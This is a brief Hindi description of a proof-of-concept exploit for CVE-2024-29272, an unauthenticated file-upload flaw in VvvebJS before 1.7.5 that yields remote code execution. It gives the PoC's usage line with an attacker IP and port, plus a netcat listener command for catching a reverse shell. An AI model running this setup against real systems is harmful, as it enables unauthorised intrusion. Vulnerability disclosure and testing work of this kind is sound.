
CVE-2024-29272 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, VvvebJS < 1.7.5 में एक अप्रमाणित मनमाना फ़ाइल अपलोड भेद्यता, दूरस्थ कोड निष्पादन को सक्षम करना।
यह CVE-2024-29272 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट है, जो VvvebJS < 1.7.5 के संस्करणों पर एक अप्रमाणित मनमानी फ़ाइल अपलोड भेद्यता है जो दूरस्थ कोड निष्पादन की ओर ले जाती है।
उपयोग:
python3 poc.py -u <URL> -l <ATTACKER IP> -p <ATTACKER PORT>
दूसरे टर्मिनल में:
nc -lvnp <ATTACKER PORT>